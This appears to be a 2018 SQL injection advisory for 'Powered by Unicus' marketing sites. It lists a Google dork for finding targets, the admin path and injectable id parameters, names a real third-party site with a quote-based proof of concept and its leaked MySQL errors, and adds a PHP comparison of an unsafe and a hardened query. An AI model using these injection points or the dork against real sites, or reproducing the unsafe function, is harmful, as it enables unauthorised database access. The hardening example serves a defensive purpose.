
Powered by Unicus Marketing SQL Injection Vulnerability

Author: KingSkrupellos, Published: 18-10-2018
# Exploit Title : Powered by Unicus Marketing SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 20/10/2018
# Vendor Homepage : unicusmarketing.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : intext:''Powered by Unicus''
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Admin Panel Login Path :

/admin/

# SQL Injection Exploit :

/article.php?id=[SQL Injection]

/issue.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

animalbehaviorandcognition.org/article.php?id=1110%27 => [ Proof of Concept ] => archive.is/zecXx

# SQL Database Error =>

Error in fetching records in table "journal_articles".
Query : select journal_articles.* from journal_articles where journal_articles.id=1110'
Error is :You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''' at line 1

Error in fetching records in table "journals left join volumes on journals.volume_id = volumes.id".
Query : select journals.*, volumes.title as volume_title from journals left join volumes on
journals.volume_id = volumes.id where journals.id=14'
Error is :You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''' at line 1
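
The error output above shows the `id` value reaching the SQL text unescaped and the failing query being returned to the visitor. The following is an added example, not code from the vendor or from this advisory: it sets that pattern beside a hardened lookup (integer validation, bound parameter, generic client error). Assumptions: the function names are hypothetical, the `title` column and sample row are constructed, and in-memory SQLite stands in for MySQL so it runs offline.

```php
<?php
declare(strict_types=1);

// In-memory SQLite stands in for the site's MySQL database (assumption).
function demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE journal_articles (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO journal_articles VALUES (1110, 'Constructed sample row')");
    return $pdo;
}

// Reconstruction of what the error output suggests (not the vendor's code):
// the raw id is pasted into the SQL text and the failing query is echoed back.
function fetch_article_unsafe(PDO $pdo, string $id): array {
    $sql = "select journal_articles.* from journal_articles where journal_articles.id=$id";
    try {
        return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        return ['error' => "Query : $sql Error is :" . $e->getMessage()];
    }
}

// Hardened: strict integer validation, bound parameter, generic error to client.
function fetch_article_safe(PDO $pdo, string $id): array {
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return ['status' => 400, 'error' => 'Invalid article id'];
    }
    try {
        $stmt = $pdo->prepare('SELECT * FROM journal_articles WHERE id = :id');
        $stmt->bindValue(':id', $n, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        error_log('article lookup failed: ' . $e->getMessage()); // detail stays server-side
        return ['status' => 500, 'error' => 'Internal error'];
    }
    return $row === false
        ? ['status' => 404, 'error' => 'Not found']
        : ['status' => 200, 'article' => $row];
}

$pdo = demo_db();
foreach (['1110', "1110'"] as $id) {   // the two id values visible on this page
    echo "id=$id\n";
    echo '  unsafe: ', json_encode(fetch_article_unsafe($pdo, $id)), "\n";
    echo '  safe:   ', json_encode(fetch_article_safe($pdo, $id)), "\n";
}
```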

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
